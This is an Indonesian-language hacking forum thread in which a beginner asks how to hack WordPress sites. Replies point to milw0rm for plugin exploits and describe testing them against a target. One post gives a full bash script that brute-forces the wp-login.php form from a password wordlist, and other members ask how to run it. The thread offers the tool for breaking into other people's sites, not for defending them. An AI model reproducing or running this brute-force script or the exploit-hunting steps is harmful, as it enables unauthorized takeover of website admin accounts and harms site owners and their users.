[ASK] Cara Hack Wordpress

[blacksymphony]

para senior yg terhormat..
Q mohon pencerahannya ttg gmna cara hack wordpress...
soalnya nyari² gak ketemu² caranya...
mohon bantuannya...

[loetoenk]

kebanyakan bug WP ada di pluginnya
coba cek di milw0rm

[blacksymphony]

yang mana na kk???

banyak bgt...

[shad.hckr]

1. Kk mgkn kudu tau macem2 bugs buat WP.. http://www.milw0rm.com
2. Coba cari di WP target ada gak yang masih nyimpen plugin/component yang nyimpen bugs..
3. kalo dah ketemu yaudah tinggal tes aja masih bisa ga plugin/component itu kita tembak..

Maaf kalo da salah..
Mohon koreksi..

[d-e-s-t-r-o-y-e-r]

nice post kk thanks buat sharingnya
ditunggu post slanjutnya...

[blacksymphony]

Coba pake wordpress login cracker
#!/usr/bin/env bash
# wordpress brute, v0.2

echo "wordpress login cracker"
echo
echo "enter website with full path to wordpress:
"; read site
echo -n "enter wordpress user
"; read user
echo -n "enter wordlist path
"; read wlpath

n=`cat "$wlpath" | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n "$i"p "$wlpath"`
b=`echo "log=$user&pwd=$password&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep ERROR`

echo trying user $user with password $password

if [ -z "$b" ]
then

echo "SUCCESS: "$site" password is: "$password""
echo "have fun..."
exit 0
fi
done
echo
echo "brute force complete"
echo "no password found "
Sumber:http://www.darkc0de.com/c0de/others/wordpress_brute.txt

thu caranya masukinya gmna kk???

muuph Q msih newbie BGT...

[blacksymphony]

kk cara masukin bryte forcenya nthu gmna???

mohon pencerahannya... please

[adi0ranye]

Tapi jika username dan passwordnya kompleks susah tuk di brute force tuh....